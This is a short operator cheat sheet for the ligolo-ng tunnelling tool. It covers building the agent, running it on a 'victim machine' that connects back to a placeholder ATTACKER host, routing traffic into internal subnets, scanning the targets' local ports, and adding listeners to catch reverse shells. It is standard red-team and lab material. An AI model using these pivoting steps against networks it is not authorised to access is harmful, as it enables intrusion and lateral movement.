Ligolo
Ligolo allows you to access distant networks over a client/server connection, using tun interfaces.
Build
git clone https://github.com/nicocha30/ligolo-ng /opt/git/ligolo
CMD='cd /src;'
CMD+='env GOARCH=amd64 CGO_ENABLED=0 go build -o /w/ligolo cmd/agent/main.go;'
CMD+='go build -o proxy cmd/proxy/main.go;'
CMD+='env GOOS=windows GOARCH=amd64 CGO_ENABLED=0 CC=x86_64-w64-mingw32-gcc go build -o /w/ligolo.exe cmd/agent/main.go;'
docker run -v /var/www/html/:/w -v /opt/git/ligolo:/src/ --rm -it golang /bin/bash -c "$CMD"
Start
Start ligolo server side on your machine, it will print the certificate fingerprint.
sudo /opt/git/ligolo/proxy -selfcert -laddr 0.0.0.0:443
Start client side on victim machine, using bind or reverse connection.
# Reverse connection
./ligolo -connect ATTACKER:443 -accept-fingerprint REPLACEWITHFINGERPRINT
# Or bind connection
./ligolo -bind VICTIM:443
# Then connect to victim from server
ligolo-ng » connect_agent --ip VICTIM:443
Route
You can now add a route on your attacker machine.
For each ligolo session tunnel you need to add an new interface.
Ligolo have interfaces features but i prefer to use system commands, that will also work when ligolo start as user.
Here is an example to add ligolo1 interface for “user” user, with 172.16.1.0/24 route
sudo ip tuntap add user user mode tun ligolo1
sudo ip link set ligolo1 up
sudo ip route add 172.16.1.0/24 dev ligolo1
Then start tunnel in ligolo
ligolo-ng » session
? Specify a session : 1 - user@TARGET - 10.10.110.123:58864 - 53e05e5a-d274-44d6-a7c9-03f47f593f59
[Agent : user@target] » start --tun ligolo1
Use interface_list to list interfaces routes
If you need to remove interface
sudo ip link set ligolo1 down
sudo ip tuntap del dev ligolo1
If you need to remove route
sudo ip route del 172.16.1.0/24
If you need to expose targeted machines local ports, use the 240.0.0.1 ip
sudo ip route add 240.0.0.1/32 dev ligolo1
nmap 240.0.0.1 -sV
sudo ip route del 240.0.0.1/32
Listener
Ligolo allow you to bind distant ports and redirect traffic back to your machine (or anywhere else)
You can use it to chain ligolo pivots, or to listen for reverseshell connection in a specific network
ligolo-ng » session
? Specify a session : 1 - user@TARGET - 10.10.110.123:58864 - 53e05e5a-d274-44d6-a7c9-03f47f593f59
[Agent : user@target] » listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp